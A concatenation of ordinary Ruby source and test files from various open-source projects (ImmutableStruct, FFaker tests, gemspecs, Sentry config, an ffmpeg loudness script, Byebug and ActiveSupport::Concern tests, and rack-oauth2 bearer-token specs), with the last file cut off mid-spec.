| 29.697674 | 93 | 0.613939 |
6a082f81e22645f4d22dc16e13bd8f3fa5908f7d | 1,735 | # encoding: utf-8
# Factory for Struct subclasses whose instances are immutable (all writers
# removed), whose constructor also accepts a single Hash of member values
# (symbol or string keys), and which gain a non-destructive #dup(overrides)
# plus JSON/YAML serialization hooks.
class ImmutableStruct
  VERSION = '1.1.1'

  # Builds and configures the Struct subclass.
  #
  # @param attrs member names (and optional body block), as for Struct.new
  # @return [Class] the configured, immutable Struct subclass
  def self.new(*attrs, &block)
    struct = Struct.new(*attrs, &block)
    make_immutable!(struct)
    optionalize_constructor!(struct)
    extend_dup!(struct)
    struct
  end

  # NOTE: `private` has no effect on the `self.` singleton methods below;
  # kept for parity with the original layout/intent.
  private

  # Removes []= and every per-member writer so instances cannot be mutated.
  def self.make_immutable!(struct)
    struct.send(:undef_method, "[]=".to_sym)
    struct.members.each do |member|
      struct.send(:undef_method, "#{member}=".to_sym)
    end
  end

  # Rewrites the constructor so a single Hash argument supplies member
  # values by name, and installs JSON/YAML (de)serialization helpers.
  def self.optionalize_constructor!(struct)
    struct.class_eval do
      alias_method :struct_initialize, :initialize

      # JSON.load hook: rebuilds an instance from the "members" hash.
      def self.json_create(object)
        new(object["members"])
      end

      def initialize(*attrs)
        if members.size > 1 && attrs && attrs.size == 1 && attrs.first.is_a?(Hash)
          hash = attrs.first
          # Use the symbol key whenever it is present — even when its value
          # is false or nil — and only otherwise fall back to the string key.
          # (The previous `hash[m] || hash[m.to_s]` lost falsy values.)
          struct_initialize(*members.map { |m| hash.key?(m) ? hash[m] : hash[m.to_s] })
        else
          struct_initialize(*attrs)
        end
      end

      # @return [Hash] member name (Symbol) => value
      def to_h
        members.inject({}) do |h, m|
          h[m.to_sym] = self[m]
          h
        end
      end

      # Psych (YAML) dump hook: emit members under string keys.
      def encode_with(coder)
        members.each do |m|
          coder[m.to_s] = self[m]
        end
      end

      # Psych (YAML) load hook: rebuild from the coder's string-keyed map.
      def init_with(coder)
        struct_initialize(*members.map { |m| coder.map[m.to_s] })
      end

      # JSON dump hook; anonymous structs cannot round-trip, so refuse them.
      def as_json
        klass = self.class.name
        klass.to_s.empty? and raise JSON::JSONError, "Only named structs are supported!"
        {
          JSON.create_id => klass,
          "members" => to_h,
        }
      end

      def to_json(*args)
        as_json.to_json(*args)
      end
    end
  end

  # Adds dup(overrides): a new instance with selected members replaced.
  def self.extend_dup!(struct)
    struct.class_eval do
      def dup(overrides={})
        self.class.new(to_h.merge(overrides))
      end
    end
  end
end
| 21.419753 | 88 | 0.575216 |
5dc1559321055b1777dbbbddfd118616510083b9 | 1,129 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'google/apis/kgsearch_v1/service.rb'
require 'google/apis/kgsearch_v1/classes.rb'
require 'google/apis/kgsearch_v1/representations.rb'
require 'google/apis/kgsearch_v1/gem_version.rb'
module Google
  module Apis
    # Knowledge Graph Search API
    #
    # Searches the Google Knowledge Graph for entities.
    #
    # The service, classes and representations for this version are loaded
    # by the requires above; this module only pins the API version constant.
    #
    # @see https://developers.google.com/knowledge-graph/
    module KgsearchV1
      # Version of the Knowledge Graph Search API this client connects to.
      # This is NOT the gem version.
      VERSION = 'V1'
    end
  end
end
| 33.205882 | 74 | 0.741364 |
18a434ecbcd644aea0be78433aa6a7c258659bdd | 671 | Pod::Spec.new do |s|
  s.name = "CountdownLabel"
  s.version = '5.0.0'
  s.summary = 'Simple countdown UILabel with morphing animation, and some useful function. update to swift 5.0+'
  s.homepage = "https://github.com/suzuki-0000/CountdownLabel"
  s.license = { :type => "MIT", :file => "LICENSE" }
  s.author = { "suzuki_keishi" => "[email protected]" }
  s.source = { :git => "https://github.com/suzuki-0000/CountdownLabel.git", :tag => s.version }
  s.platform = :ios, "10"
  # The recursive glob also matches top-level sources, so the previous
  # non-recursive `CountdownLabel/*.swift` assignment was dead code
  # (immediately overwritten) and has been removed.
  s.source_files = 'CountdownLabel/**/*.swift'
  s.requires_arc = true
  s.frameworks = "UIKit"
end
| 44.733333 | 117 | 0.621461 |
edafa081fb1689645f6a9cb1b2a3a94fc6aceb71 | 2,687 | # encoding: utf-8
require 'helper'
# Exercises FFaker's address generators: deterministic output (given a
# fixed seed, via DeterministicHelper) and basic shape of generated values.
class TestAddress < Test::Unit::TestCase
  include DeterministicHelper

  # Declares that each listed generator returns the same value for the
  # same random seed.
  assert_methods_are_deterministic(
    FFaker::Address,
    :building_number, :city, :city_prefix, :city_suffix, :secondary_address,
    :street_address, :street_name, :street_suffix, :neighborhood,
    :country, :country_code, :time_zone
  )

  assert_methods_are_deterministic(
    FFaker::AddressUS,
    :state, :state_abbr, :zip_code
  )

  def test_building_number
    assert_match(/\A\d{3,5}\z/, FFaker::Address.building_number)
  end

  def test_city
    assert_match(/[ a-z]+/, FFaker::Address.city)
  end

  def test_city_prefix
    assert_match(/[ a-z]/, FFaker::Address.city_prefix)
  end

  def test_city_suffix
    assert_match(/[ a-z]/, FFaker::Address.city_suffix)
  end

  def test_secondary_address
    assert_match(/[ a-z]/, FFaker::Address.secondary_address)
  end

  def test_street_address
    assert_match(/[ a-z]/, FFaker::Address.street_address)
  end

  def test_street_name
    assert_match(/[ a-z]/, FFaker::Address.street_name)
  end

  def test_street_suffix
    assert_match(/[ a-z]/, FFaker::Address.street_suffix)
  end

  def test_uk_country
    assert_match(/[ a-z]/, FFaker::AddressUK.country)
    assert_deterministic { FFaker::AddressUK.country }
  end

  def test_uk_county
    assert_match(/[ a-z]/, FFaker::AddressUK.county)
    assert_deterministic { FFaker::AddressUK.county }
  end

  def test_uk_postcode
    assert_match(/[ a-z]/, FFaker::AddressUK.postcode)
    assert_deterministic { FFaker::AddressUK.postcode }
  end

  def test_us_state
    assert_match(/[ a-z]/, FFaker::AddressUS.state)
  end

  def test_us_state_abbr
    assert_match(/[A-Z]/, FFaker::AddressUS.state_abbr)
  end

  def test_zip_code
    assert_match(/[0-9]/, FFaker::AddressUS.zip_code)
  end

  # NOTE(review): asserts zip_code is NOT frozen; `refute ... .frozen?`
  # would read better but behaves identically.
  def test_zip_code_frozen
    assert FFaker::AddressUS.zip_code.frozen? == false
  end

  def test_neighborhood
    assert_match(/[ a-z]+/, FFaker::Address.neighborhood)
  end

  def test_country
    assert_match(/[ a-z]+/, FFaker::Address.country)
  end

  # Looking up a country by its ISO code.
  def test_country_by_county_code
    assert_match('Ukraine', FFaker::Address.country('UA'))
    assert_deterministic { FFaker::Address.country('UA') }
  end

  def test_country_code
    assert_match(/[A-Z]{2}/, FFaker::Address.country_code)
  end

  # Unknown country names fall back to some two-letter code.
  def test_country_code_of_particular_country
    assert_match('UA', FFaker::Address.country_code('Ukraine'))
    assert_match(/[A-Z]{2}/, FFaker::Address.country_code('Foo'))
    assert_deterministic { FFaker::Address.country_code('Ukraine') }
  end

  def test_time_zone
    assert_include FFaker::Address::TIME_ZONE, FFaker::Address.time_zone
  end
end
| 24.427273 | 76 | 0.717529 |
876dc1fbbd42cd0c00f7a4588cc2ab04d66a5626 | 429 | require_relative "../canvas_base_input_type"
module LMSGraphQL
  module Types
    module Canvas
      # GraphQL input type wrapping Canvas proficiency-rating parameters.
      class CanvasProficiencyInput < BaseInputObject
        description "Proficiency Ratings. API Docs: https://canvas.instructure.com/doc/api/proficiency_ratings.html"
        # NOTE(review): the help text says "an array of proficiency ratings"
        # but the declared GraphQL type is String, not [String] — confirm
        # against the generator/consumers before changing.
        argument :ratings, String, "An array of proficiency ratings. See the ProficiencyRating specification above..", required: false
      end
    end
  end
end | 30.642857 | 132 | 0.752914 |
d51dc6be92fe77b751341fd987ab1c2d5dab6cc0 | 1,248 | # Configure Rails Environment
# Run the suite against the test environment unless told otherwise.
ENV["RAILS_ENV"] ||= 'test'

# Boot Rails from whichever host application is available: a local dummy
# app, or (when vendored inside a Refinery app) the enclosing application.
if File.exist?(dummy_path = File.expand_path('../dummy/config/environment.rb', __FILE__))
  require dummy_path
elsif File.dirname(__FILE__) =~ %r{vendor/extensions}
  # Require the path to the refinerycms application this is vendored inside.
  require File.expand_path('../../../../../config/environment', __FILE__)
else
  puts "Could not find a config/environment.rb file to require. Please specify this in #{File.expand_path(__FILE__)}"
end

require 'rspec/rails'
require 'capybara/rspec'

# Show full backtraces in spec failures.
Rails.backtrace_cleaner.remove_silencers!

RSpec.configure do |config|
  config.mock_with :rspec
  config.treat_symbols_as_metadata_keys_with_true_values = true
  # `fit`/`:focus` support: run only focused examples when any exist.
  config.filter_run :focus => true
  config.run_all_when_everything_filtered = true
  # fix deprecation warnings
  config.infer_spec_type_from_file_location!
  config.expose_current_running_example_as :example
end

# Requires supporting files with custom matchers and macros, etc,
# in ./support/ and its subdirectories including factories.
([Rails.root.to_s] | ::Refinery::Plugins.registered.pathnames).map{|p|
  Dir[File.join(p, 'spec', 'support', '**', '*.rb').to_s]
}.flatten.sort.each do |support_file|
  require support_file
end
| 34.666667 | 117 | 0.766026 |
e84cfbd8cf3de668c7a26de318b604d1bb35574b | 713 | require "spec_helper"
require "hamster/stack"
describe Hamster::Stack do
  # #pop and #dequeue behave identically, so run the same table for both.
  [:pop, :dequeue].each do |method|
    describe "##{method}" do
      # [input values, expected values after removing the top element]
      [
        [[], []],
        [["A"], []],
        [%w[A B], ["A"]],
        [%w[A B C], %w[A B]],
      ].each do |values, expected|
        describe "on #{values.inspect}" do
          before do
            @original = Hamster.stack(*values)
            @result = @original.send(method)
          end

          # Persistent data structure: the receiver must be unchanged.
          it "preserves the original" do
            @original.should == Hamster.stack(*values)
          end

          it "returns #{expected.inspect}" do
            @result.should == Hamster.stack(*expected)
          end
        end
      end
    end
  end
end | 23 | 54 | 0.490884 |
332d5216852e8e706c1c45f3437c9da5a26f63f4 | 1,427 | # encoding: utf-8
# Make lib/ loadable so the version file below can be required.
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'jekyll-pandoc-multiple-formats/version'

Gem::Specification.new do |gem|
  gem.name = 'jekyll-pandoc-multiple-formats'
  gem.version = JekyllPandocMultipleFormats::VERSION
  gem.authors = ['Mauricio Pasquier Juan', 'Nicolás Reynolds']
  gem.email = ['[email protected]', '[email protected]']
  gem.description = %q{This jekyll plugin was inspired by
    jekyll-pandoc-plugin but it was changed to generate multiple outputs,
    rather than just using pandoc to generate jekyll html posts. Besides,
    it doesn't require the 'pandoc-ruby' gem.}
  gem.summary = %q{Use pandoc on jekyll to generate posts in multiple formats}
  gem.homepage = 'https://github.com/fauno/jekyll-pandoc-multiple-formats'
  gem.license = 'MIT'

  # Package everything tracked by git; expose bin/ scripts as executables.
  gem.files = `git ls-files`.split($/)
  gem.executables = gem.files.grep(%r{^bin/}).map{ |f| File.basename(f) }
  gem.test_files = gem.files.grep(%r{^(test|spec|features)/})
  gem.require_paths = ['lib']

  gem.add_dependency('jekyll', '~> 3.7.0')
  gem.add_dependency('pdf_info', '~> 0.5.0')
  gem.add_dependency('rtex', '~> 2.1.0')
  gem.add_development_dependency('rake', '~> 10.5.0')
  gem.add_development_dependency('minitest', '~> 5.8.0')
  gem.add_development_dependency('shoulda', '~> 3.5.0')
end
| 46.032258 | 84 | 0.683952 |
6ac741f1bad500e0668e514507d2d552d8275921 | 363 | require 'postal/config'
# Configure Sentry (Raven) error reporting, but only when an exception
# reporting URL has been configured for this installation.
if Postal.config.general&.exception_url
  require 'raven'
  Raven.configure do |config|
    config.dsn = Postal.config.general.exception_url
    config.environments = ['production']
    # Opt in to reporting from development via the DEV_EXCEPTIONS env var.
    config.environments << 'development' if ENV['DEV_EXCEPTIONS']
    config.silence_ready = true
    # Tag each event with the originating process name.
    config.tags = { process: ENV['PROC_NAME'] }
  end
end
| 27.923077 | 65 | 0.721763 |
f7ebb6def9fd5efcc6c253425e45e15e8c458d8d | 782 | # == Schema Information
#
# Table name: summaries
#
# id :bigint not null, primary key
# content :text not null
# created_at :datetime not null
# updated_at :datetime not null
# author_id :integer not null
# feature_id :integer not null
# language_id :integer not null
#
# A localized summary text attached to a Feature (see schema header above).
class Summary < ActiveRecord::Base
  belongs_to :feature, touch: true # touch keeps the feature's timestamp/cache fresh
  belongs_to :language
  belongs_to :author, :class_name => 'AuthenticatedSystem::Person'
  has_many :imports, :as => 'item', :dependent => :destroy

  # At most one summary per language for a given feature.
  validates :language_id, :uniqueness => {:scope => :feature_id}
  # The tag-stripped body must be 1..750 characters.
  validates :plain_content, length: 1..750

  include KmapsEngine::IsCitable

  # The summary body with HTML tags removed.
  def plain_content
    content.strip_tags
  end
end
| 26.965517 | 66 | 0.643223 |
914aa752ab80b5cc1524094c280f8833126bc5b7 | 961 | require 'tempfile'
require 'json'
# Measures an input file's peak volume with ffmpeg's volumedetect filter,
# reads its audio codec/sample rate with ffprobe, and prints the gain
# needed to bring the peak to -3.0 dB. The actual normalization command is
# left commented out at the bottom.
#
# NOTE(review): the input path is interpolated into shell commands with
# only single quotes — a path containing a quote breaks the command; the
# script assumes trusted input. ARGV[0] is also assumed present (no guard).
target = ARGV[0].tr("\\","/")
temp = Tempfile.new
new_name = 'NORMALIZED_' + File.basename(target)
file_path = File.dirname(target)
output_name = file_path + '/' + new_name
ffprobe_command = "ffprobe -v quiet -print_format json -show_format -show_streams -select_streams a '" + target + "'"
# volumedetect writes its report to stderr, captured into the tempfile.
ffmpeg_command = "ffmpeg -i '" + target + "' -vn -af volumedetect -f null - 2> #{temp.path}"
`#{ffmpeg_command}`
ffprobe_out = JSON.parse(`#{ffprobe_command}`)
normalization_data = File.readlines(temp).select {|line| line.include? 'max_volume'}
audio_codec = ffprobe_out['streams'][0]['codec_name']
sample_rate = ffprobe_out['streams'][0]['sample_rate']
# Gain (dB) required to move the detected max_volume to -3.0 dB.
normalization_value = (-3.0 - normalization_data[0].split(' ')[4].to_f)
puts normalization_data
puts normalization_value
puts audio_codec
puts sample_rate
# `ffmpeg -i #{target} -c:v copy -c:a #{audio_codec} -ar #{sample_rate} -af volume="#{normalization_value}dB" #{output_name}` | 43.681818 | 125 | 0.724246 |
bf840118ca8164f1d0c07a5a8263985b14740c33 | 1,235 | # frozen_string_literal: true
require "test_helper"
module Byebug
  #
  # Tests exception catching via the `catch` command: adding catchpoints,
  # removing one or all, listing, and the help text.
  #
  class CatchTest < TestCase
    def test_catch_adds_catchpoints
      enter "catch NoMethodError"
      debug_code(minimal_program)

      assert_equal 1, Byebug.catchpoints.size
    end

    def test_catch_removes_specific_catchpoint
      enter "catch NoMethodError", "catch NoMethodError off"
      debug_code(minimal_program)

      assert_empty Byebug.catchpoints
    end

    # Bare "catch off" prompts for confirmation; "y" accepts it.
    def test_catch_off_removes_all_catchpoints_after_confirmation
      enter "catch NoMethodError", "catch off", "y"
      debug_code(minimal_program)

      assert_empty Byebug.catchpoints
    end

    def test_catch_without_arguments_and_no_exceptions_caught
      enter "catch"
      debug_code(minimal_program)

      check_output_includes "No exceptions set to be caught."
    end

    def test_catch_without_arguments_and_exceptions_caught
      enter "catch NoMethodError", "catch"
      debug_code(minimal_program)

      check_output_includes "NoMethodError: false"
    end

    def test_catch_help
      enter "help catch"
      debug_code(minimal_program)

      check_output_includes "cat[ch][ (off|<exception>[ off])]"
    end
  end
end
| 23.301887 | 65 | 0.728745 |
1af3627ecb5e3dd55e265526c389835ba453b473 | 412 | module BacklogKit
  class Client
    # Methods for the Git API
    module Git
      # Get list of git repositories
      #
      # @param project_id_or_key [Integer, String] Project id or project key
      # @return [BacklogKit::Response] List of git repositories
      def get_git_repositories(project_id_or_key)
        # Delegates to the client's generic GET with the project filter.
        get('git/repositories', project_id_or_key: project_id_or_key)
      end
    end
  end
end
| 27.466667 | 76 | 0.68932 |
e8e625506f020aa6a121d4ffb7d1be67fa6006c7 | 1,807 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# NOTE: this file is generated by AutoRest (see the header comment above);
# prefer regenerating over hand-editing, as manual changes will be lost.
module Azure::ContainerRegistry::Mgmt::V2018_09_01
  module Models
    #
    # Describes the credentials that will be used to access a custom registry
    # during a run.
    #
    class CustomRegistryCredentials

      include MsRestAzure

      # @return [SecretObject] The username for logging into the custom
      # registry.
      attr_accessor :user_name

      # @return [SecretObject] The password for logging into the custom
      # registry. The password is a secret
      # object that allows multiple ways of providing the value for it.
      attr_accessor :password


      #
      # Mapper for CustomRegistryCredentials class as Ruby Hash.
      # This will be used for serialization/deserialization.
      #
      def self.mapper()
        {
          client_side_validation: true,
          required: false,
          serialized_name: 'CustomRegistryCredentials',
          type: {
            name: 'Composite',
            class_name: 'CustomRegistryCredentials',
            model_properties: {
              user_name: {
                client_side_validation: true,
                required: false,
                serialized_name: 'userName',
                type: {
                  name: 'Composite',
                  class_name: 'SecretObject'
                }
              },
              password: {
                client_side_validation: true,
                required: false,
                serialized_name: 'password',
                type: {
                  name: 'Composite',
                  class_name: 'SecretObject'
                }
              }
            }
          }
        }
      end
    end
  end
end
| 28.68254 | 77 | 0.556724 |
e2e819035b82d2df9d59ca40161a6a0febafd461 | 4,154 | # frozen_string_literal: true
require_relative "abstract_unit"
require "active_support/concern"
# Exercises ActiveSupport::Concern: ClassMethods extension, included/
# prepended hooks, dependency resolution between concerns, and the
# multiple-block error cases.
class ConcernTest < ActiveSupport::TestCase
  # Base concern: defines instance #baz, class-level baz plus flags that
  # record whether the included/prepended hooks ran.
  module Baz
    extend ActiveSupport::Concern

    class_methods do
      def baz
        "baz"
      end

      def included_ran=(value)
        @included_ran = value
      end

      def included_ran
        @included_ran
      end

      def prepended_ran=(value)
        @prepended_ran = value
      end

      def prepended_ran
        @prepended_ran
      end
    end

    included do
      self.included_ran = true
    end

    prepended do
      self.prepended_ran = true
    end

    def baz
      "baz"
    end
  end

  # Depends on Baz; overrides both instance and class baz via super.
  module Bar
    extend ActiveSupport::Concern

    include Baz

    module ClassMethods
      def baz
        "bar's baz + " + super
      end
    end

    def bar
      "bar"
    end

    def baz
      "bar+" + super
    end
  end

  # Pulls in both Bar and Baz; Concern must order the dependencies.
  module Foo
    extend ActiveSupport::Concern

    include Bar, Baz
  end

  # Plain (non-Concern) module used for the global-pollution regression test.
  module Qux
    module ClassMethods
    end
  end

  def setup
    @klass = Class.new
  end

  def test_module_is_included_normally
    @klass.include(Baz)

    assert_equal "baz", @klass.new.baz
    assert_includes @klass.included_modules, ConcernTest::Baz
  end

  def test_module_is_prepended_normally
    @klass.prepend(Baz)

    assert_equal "baz", @klass.new.baz
    assert_includes @klass.included_modules, ConcernTest::Baz
  end

  def test_class_methods_are_extended
    @klass.include(Baz)

    assert_equal "baz", @klass.baz
    assert_equal ConcernTest::Baz::ClassMethods, (class << @klass; included_modules; end)[0]
  end

  def test_class_methods_are_extended_when_prepended
    @klass.prepend(Baz)

    assert_equal "baz", @klass.baz
    assert_equal ConcernTest::Baz::ClassMethods, (class << @klass; included_modules; end)[0]
  end

  # Regression: a ClassMethods module reachable via Object must not leak
  # onto unrelated classes.
  def test_class_methods_are_extended_only_on_expected_objects
    ::Object.include(Qux)
    Object.extend(Qux::ClassMethods)
    # module needs to be created after Qux is included in Object or bug won't
    # be triggered
    test_module = Module.new do
      extend ActiveSupport::Concern

      class_methods do
        def test
        end
      end
    end
    @klass.include test_module

    assert_not_respond_to Object, :test
    Qux.class_eval do
      remove_const :ClassMethods
    end
  end

  def test_included_block_is_ran
    @klass.include(Baz)

    assert_equal true, @klass.included_ran
  end

  def test_included_block_is_not_ran_when_prepended
    @klass.prepend(Baz)

    assert_nil @klass.included_ran
  end

  def test_prepended_block_is_ran
    @klass.prepend(Baz)

    assert_equal true, @klass.prepended_ran
  end

  def test_prepended_block_is_not_ran_when_included
    @klass.include(Baz)

    assert_nil @klass.prepended_ran
  end

  def test_modules_dependencies_are_met
    @klass.include(Bar)

    assert_equal "bar", @klass.new.bar
    assert_equal "bar+baz", @klass.new.baz
    assert_equal "bar's baz + baz", @klass.baz
    assert_includes @klass.included_modules, ConcernTest::Bar
  end

  def test_dependencies_with_multiple_modules
    @klass.include(Foo)

    assert_equal [ConcernTest::Foo, ConcernTest::Bar, ConcernTest::Baz], @klass.included_modules[0..2]
  end

  def test_dependencies_with_multiple_modules_when_prepended
    @klass.prepend(Foo)

    assert_equal [ConcernTest::Foo, ConcernTest::Bar, ConcernTest::Baz], @klass.included_modules[0..2]
  end

  def test_raise_on_multiple_included_calls
    assert_raises(ActiveSupport::Concern::MultipleIncludedBlocks) do
      Module.new do
        extend ActiveSupport::Concern

        included do
        end

        included do
        end
      end
    end
  end

  def test_raise_on_multiple_prepended_calls
    assert_raises(ActiveSupport::Concern::MultiplePrependBlocks) do
      Module.new do
        extend ActiveSupport::Concern

        prepended do
        end

        prepended do
        end
      end
    end
  end

  # Re-loading the same concern file must not trip the multiple-block guard.
  def test_no_raise_on_same_included_or_prepended_call
    assert_nothing_raised do
      2.times do
        load File.expand_path("../fixtures/concern/some_concern.rb", __FILE__)
      end
    end
  end
end
| 20.979798 | 102 | 0.689215 |
7a514eee3704f66bd615feb5be61136247bca5cd | 356 | cask 'manager' do
  version '18.5.21'
  sha256 '0be82612b7f63653e73d9a64077a112c93bf8cecf5f9989434b828a9c976f3b5'

  # d2ap5zrlkavzl7.cloudfront.net was verified as official when first introduced to the cask
  url "https://d2ap5zrlkavzl7.cloudfront.net/#{version}/Manager.dmg"
  name 'Manager'
  homepage 'https://www.manager.io/'

  app 'Manager.app'
end
| 29.666667 | 92 | 0.772472 |
1de1c8d156aa8e192191cf87b6e6f213d8013b6c | 692 | # encoding: utf-8
module HarmoniousDictionary
  # Adds a `validate_harmonious_of` macro to ActiveModel/ActiveRecord-style
  # classes for rejecting attribute values that contain censored words.
  module ModelAdditions
    # Validates that each of +attr_names+ passes HarmoniousDictionary.clean?.
    # A trailing Hash on +attr_names+ supplies validation options such as
    # :message — note it is destructively popped off the caller's array.
    # +option+'s first value, when given, selects a specific word library.
    def validate_harmonious_of(attr_names, option = {})
      configuration = {message:'不能含有敏感词'} # default message: "must not contain sensitive words"
      library = option.values[0].to_s
      configuration.update(attr_names.pop) if attr_names.last.is_a?(Hash)

      validates_each attr_names do |model, attribute, value|
        unless value.blank?
          if option.size == 0
            # No library given: check against the default dictionary.
            model.errors.add(attribute, configuration[:message]) unless HarmoniousDictionary.clean?(value)
          else
            model.errors.add(attribute, configuration[:message]) unless HarmoniousDictionary.clean?(value, library)
          end
        end
      end
    end
  end
end
| 32.952381 | 115 | 0.674855 |
0150e9d67dde3e5bbc498fbf83b412d2150231d8 | 1,831 | #
# Author:: Tyler Cloke ([email protected])
# Copyright:: Copyright 2015-2016, Chef Software, Inc
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require_relative "../knife"
require_relative "key_list_base"
class Chef
  class Knife
    # Implements knife client key list using Chef::Knife::KeyList
    # as a service class.
    #
    # @author Tyler Cloke
    #
    # @attr_reader [String] actor the name of the client that this key is for
    class ClientKeyList < Knife
      include Chef::Knife::KeyListBase

      banner "knife client key list CLIENT (options)"

      deps do
        require_relative "key_list"
      end

      attr_reader :actor

      def initialize(argv = [])
        super(argv)
        @service_object = nil
      end

      # Validates arguments then delegates the actual listing to KeyList.
      def run
        apply_params!(@name_args)
        service_object.run
      end

      # KeyList method used to fetch keys for this actor type.
      def list_method
        :list_by_client
      end

      def actor_missing_error
        "You must specify a client name"
      end

      # Lazily builds the KeyList service object for this command.
      def service_object
        @service_object ||= Chef::Knife::KeyList.new(@actor, list_method, ui, config)
      end

      # Extracts the client name from CLI args; exits with usage when absent.
      def apply_params!(params)
        @actor = params[0]
        if @actor.nil?
          show_usage
          ui.fatal(actor_missing_error)
          exit 1
        end
      end
    end
  end
end
| 24.743243 | 85 | 0.656472 |
1ce3bb9ee8aa23c9882e63dd6309cabc6b6fc16d | 2,394 | require "rails_helper"
require "gds_api/test_helpers/content_store"
require "gds_api/test_helpers/router"
# Specs for DataHygiene::DocumentStatusChecker: verifies whether a published
# document has propagated to the content store and to the router.
RSpec.describe DataHygiene::DocumentStatusChecker do
  include GdsApi::TestHelpers::ContentStore
  include GdsApi::TestHelpers::Router

  let(:base_path) { "/base-path" }

  describe "content-store status" do
    subject { described_class.new(document).content_store? }

    context "with a published live edition" do
      let(:edition) { create(:live_edition, base_path: base_path) }
      let(:document) { edition.document }

      context "and there is no content item" do
        before { stub_content_store_does_not_have_item(base_path) }

        it { is_expected.to be false }
      end

      context "and there is an old content item" do
        # Content item updated one second *before* publication, so the
        # content store should be treated as out of date.
        let(:content_item) do
          content_item_for_base_path(base_path).merge(
            "updated_at" => (edition.published_at - 1).iso8601,
          )
        end

        before { stub_content_store_has_item(base_path, content_item) }

        it { is_expected.to be false }
      end

      context "and there is a recent content item" do
        # Updated one second *after* publication => considered in sync.
        let(:content_item) do
          content_item_for_base_path(base_path).merge(
            "updated_at" => (edition.published_at + 1).iso8601,
          )
        end

        before { stub_content_store_has_item(base_path, content_item) }

        it { is_expected.to be true }
      end
    end
  end

  describe "router status" do
    subject { described_class.new(document).router? }

    # The router client authenticates with a bearer token read from the
    # environment; ClimateControl scopes the variable to each example.
    around do |example|
      ClimateControl.modify ROUTER_API_BEARER_TOKEN: "token" do
        example.run
      end
    end

    context "with a published live edition" do
      let(:edition) { create(:live_edition, base_path: base_path) }
      let(:document) { edition.document }

      context "and there is no content item" do
        before { stub_router_doesnt_have_route(base_path) }

        it { is_expected.to be false }
      end

      context "and there is a content item" do
        before { stub_router_has_backend_route(base_path, backend_id: backend_id) }

        # The route only counts as correct when it points at the edition's
        # own rendering application.
        context "with the same backend_id" do
          let(:backend_id) { edition.rendering_app }

          it { is_expected.to be true }
        end

        context "with a different backend_id" do
          let(:backend_id) { "nothing" }

          it { is_expected.to be false }
        end
      end
    end
  end
end
| 30.303797 | 83 | 0.652464 |
87a9a64904bcb68b3070e1f2a3a023f76483b25f | 241 | # frozen_string_literal: true
module Dynamodb
  module Api
    module Relation
      # Immutable value object holding the row-count limit of a query. # :nodoc:
      class LimitClause # :nodoc:
        # @param number [Integer] maximum number of items the query may return
        def initialize(number)
          @number = number
        end

        # The limit value supplied at construction time (read-only).
        def number
          @number
        end
      end
    end
  end
end
| 15.0625 | 33 | 0.605809 |
ff1d7c8965ea308cfffcccba44bf8c29acc91342 | 4,019 | require 'spec_helper.rb'
describe Rack::OAuth2::Server::Resource::Bearer do
let(:app) do
Rack::OAuth2::Server::Resource::Bearer.new(simple_app) do |request|
case request.access_token
when 'valid_token'
bearer_token
when 'insufficient_scope_token'
request.insufficient_scope!
else
request.invalid_token!
end
end
end
let(:bearer_token) do
Rack::OAuth2::AccessToken::Bearer.new(:access_token => 'valid_token')
end
let(:access_token) { env[Rack::OAuth2::Server::Resource::ACCESS_TOKEN] }
let(:request) { app.call(env) }
subject { app.call(env) }
shared_examples_for :authenticated_bearer_request do
it 'should be authenticated' do
status, header, response = request
status.should == 200
access_token.should == bearer_token
end
end
shared_examples_for :unauthorized_bearer_request do
it 'should be unauthorized' do
status, header, response = request
status.should == 401
header['WWW-Authenticate'].should include 'Bearer'
access_token.should be_nil
end
end
shared_examples_for :bad_bearer_request do
it 'should be bad_request' do
status, header, response = request
status.should == 400
access_token.should be_nil
end
end
shared_examples_for :skipped_authentication_request do
it 'should skip OAuth 2.0 authentication' do
status, header, response = request
status.should == 200
access_token.should be_nil
end
end
context 'when no access token is given' do
let(:env) { Rack::MockRequest.env_for('/protected_resource') }
it_behaves_like :skipped_authentication_request
end
context 'when valid_token is given' do
context 'when token is in Authorization header' do
let(:env) { Rack::MockRequest.env_for('/protected_resource', 'HTTP_AUTHORIZATION' => 'Bearer valid_token') }
it_behaves_like :authenticated_bearer_request
end
context 'when token is in params' do
let(:env) { Rack::MockRequest.env_for('/protected_resource', :params => {:access_token => 'valid_token'}) }
it_behaves_like :authenticated_bearer_request
end
end
context 'when invalid authorization header is given' do
let(:env) { Rack::MockRequest.env_for('/protected_resource', 'HTTP_AUTHORIZATION' => '') }
it_behaves_like :skipped_authentication_request
end
context 'when invalid_token is given' do
let(:env) { Rack::MockRequest.env_for('/protected_resource', 'HTTP_AUTHORIZATION' => 'Bearer invalid_token') }
context 'when token is in Authorization header' do
it_behaves_like :unauthorized_bearer_request
end
context 'when token is in params' do
let(:env) { Rack::MockRequest.env_for('/protected_resource', :params => {:access_token => 'invalid_token'}) }
it_behaves_like :unauthorized_bearer_request
end
describe 'realm' do
context 'when specified' do
let(:realm) { 'server.example.com' }
let(:app) do
Rack::OAuth2::Server::Resource::Bearer.new(simple_app, realm) do |request|
request.unauthorized!
end
end
it 'should use specified realm' do
status, header, response = request
header['WWW-Authenticate'].should include "Bearer realm=\"#{realm}\""
end
end
context 'otherwize' do
it 'should use default realm' do
status, header, response = request
header['WWW-Authenticate'].should include "Bearer realm=\"#{Rack::OAuth2::Server::Resource::Bearer::DEFAULT_REALM}\""
end
end
end
end
context 'when multiple access_token is given' do
context 'when token is in Authorization header and params' do
let(:env) do
Rack::MockRequest.env_for(
'/protected_resource',
